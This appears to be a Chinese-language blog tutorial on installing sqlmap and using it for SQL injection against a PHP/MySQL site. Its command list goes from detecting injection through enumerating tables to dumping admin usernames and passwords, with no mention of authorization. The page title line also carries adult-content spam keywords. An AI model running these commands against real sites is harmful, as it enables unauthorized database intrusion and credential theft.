亚洲第一区香蕉_国产a,国产成人精品免费视频网页大全,www.久久草,成人免费性视频

當(dāng)前位置:首頁 > 互聯(lián)網(wǎng)雜談 > 正文內(nèi)容

利用sqlmap進行php+mysql注入(windows環(huán)境)

小熊7年前 (2018-06-25)互聯(lián)網(wǎng)雜談4393

老威SEO前段時間研究了一下sqlmap,其作為一款自動化的sql注入滲透工具,注入方式、注入成功后的取數(shù)據(jù)等等都是自動化的,非常適合我們這些小白前期玩玩滲透玩玩安全,它是用python寫的,因此需要先安裝python環(huán)境,一般都是傻瓜式安裝操作

一、sqlmap的安裝

1.python下載地址:

https://www.python.org/downloads/

2.sqlmap下載地址:

http://sqlmap.org/

把下載的sqlmap壓縮包解壓到文件夾sqlmap中,并將其復(fù)制粘貼到 “C:\Python27” 目錄下(注:Python27為python安裝文件夾)

在桌面新建一個cmd的快捷方式,將其命名為“SQLMap”,并鍵入對象位置為:cmd,快捷方式名稱:SQLMap

雙擊剛才創(chuàng)建的快捷方式,輸入sqlmap.py -h,出現(xiàn)如下信息則表示安裝成功。 

sqlmap教程

二、sqlmap的常用命令

sqlmap.py -u "http://www.zhihuishangjia.com/xxxx.php?id=1193"  檢測注入

sqlmap.py -u "http://www.zhihuishangjia.com/xxxx.php?id=1193" --current-user   獲取當(dāng)前用戶  laowei@localhost

sqlmap.py -u "http://www.zhihuishangjia.com/xxxx.php?id=1193" --current-db 獲取當(dāng)前數(shù)據(jù)庫 如為db_inis

sqlmap.py -u "http://www.zhihuishangjia.com/xxxx.php?id=1193" --tables -D db_inis

sqlmap.py -u "http://www.zhihuishangjia.com/xxxx.php?id=1193" -D db_inis --tables  獲取當(dāng)前數(shù)據(jù)庫下所有表 如表為3

sqlmap.py -u "http://www.zhihuishangjia.com/xxxx.php?id=1193" -D db_inis --tables --columns -T wd_admin_user   獲取表3下的所有字段 如字段為4,5,6

sqlmap.py -u "http://www.zhihuishangjia.com/xxxx.php?id=1193" -D db_inis --tables --columns -T wd_admin_user -C pwd,username --dump   注入完成

最后:此文章還待更新中……請持續(xù)關(guān)注

掃描二維碼推送至手機訪問。

版權(quán)聲明:本文由小熊SEO發(fā)布,如需轉(zhuǎn)載請注明出處。

本文鏈接:http://www.zhihuishangjia.com/hlw/100.html

相關(guān)文章

mysql批量修改與替換語句的方法

mysql批量修改與替換語句的方法

MySQL批量替換指定字段字符串語句UPDATE 數(shù)據(jù)表名 SET 字段名 = replace(字段名, '要替換的字符串', '替換為') WHERE 設(shè)定條件;例子...

整理了一些獲得ip地理信息的幾種方法

整理了一些獲得ip地理信息的幾種方法

第一種是利用純真ip數(shù)據(jù)庫,這個可以在網(wǎng)上找到很多,缺點是更新有點慢。第二種是利用各大門戶網(wǎng)站的接口目前老威知道的有騰訊、新浪、網(wǎng)易、搜狐和Google提供IP地址查詢API,但是找得到的只有騰訊、新...

火車采集器7.6版本閃退的解決辦法

火車采集器7.6版本閃退的解決辦法

老威最近在做幾個站,因為數(shù)據(jù)量比較大,所以前期的東西都是要采集的,但是火車頭采集器最近卻一直閃退,采不了多少就崩潰一次,這讓我很是煩躁,于是在網(wǎng)上找了幾種方法,還真就找到了,分享給大家首先去火車頭根目...

阿里云虛擬主機設(shè)置301重定向

阿里云虛擬主機設(shè)置301重定向

目前老威SEO博客是搭建在阿里云虛擬主機里面的,本來這個主機管理頁面有一個301重定向的功能,設(shè)置好根域名跳轉(zhuǎn)www域名之后我就沒怎么管,直到昨天我才發(fā)現(xiàn)它只有這一個跳轉(zhuǎn),根域名其他的目錄根本不能跳轉(zhuǎn)...

windows server2012遠程桌面多用戶同時登錄的方法

windows server2012遠程桌面多用戶同時登錄的方法

目前市面上各大服務(wù)商的遠程服務(wù)器老威幾乎都用過,印象里好像只有西部數(shù)碼是配備了允許三個遠程用戶同時登陸,其他的應(yīng)該都是一個,這樣其實非常不方便,如果一個公司有兩個以上的技術(shù)同時對服務(wù)器有操作需求的話就...

發(fā)表評論

訪客

◎歡迎參與討論,請在這里發(fā)表您的看法和觀點。